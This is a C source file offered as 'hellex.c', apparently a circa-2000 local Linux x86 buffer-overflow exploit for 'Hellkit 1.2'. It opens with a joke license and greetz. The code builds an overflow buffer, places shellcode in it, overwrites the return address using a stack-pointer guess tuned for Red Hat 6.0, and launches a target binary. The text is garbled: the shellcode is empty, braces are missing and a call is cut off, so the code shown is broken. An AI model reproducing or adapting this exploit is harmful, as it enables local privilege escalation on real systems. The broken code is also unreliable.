 * released under (E) licensing ...            *
 *        (E) RULES AND REGULATIONS            *
 * permission to use/rewrite/add     : granted *
 * permission to trojan/steal        : denied  *
 * permission to use illegally       : denied  *
 * permission to use on /dev/urandom : denied  *
/* contact el8@press.co.jp for full license    */
/* code copyrighted by ~el8 -- don't infringe! */

/* hellex.c - Hellkit 1.2 local linux (x86) exploit by Narrow */
/* Greetz: Legion2000, buffer0verflow and Scrippie (of courz) */

/* Tue May 23 14:04:35 2000 - It doesn't suck much memonry ;-)*/

#include <stdio.h>
#include <string.h>

#define OFFSETS -500          // Red Hat 6.0

char shellcode[] =

unsigned long get_sp(void) {
    __asm__("movl %esp, %eax");

int main(int argc,char **argv)
  char buf[973];
  int offset;

  if(argc < 2) { offset = OFFSETS; } else { offset = atoi(argv[1]); }
  memcpy(buf + sizeof(buf) - strlen(shellcode) - 8, shellcode, strlen(shellcode
  *(long *)&buf[973 - 4] = get_sp() - offset;
  execl("./driver", "drank-driver", buf);

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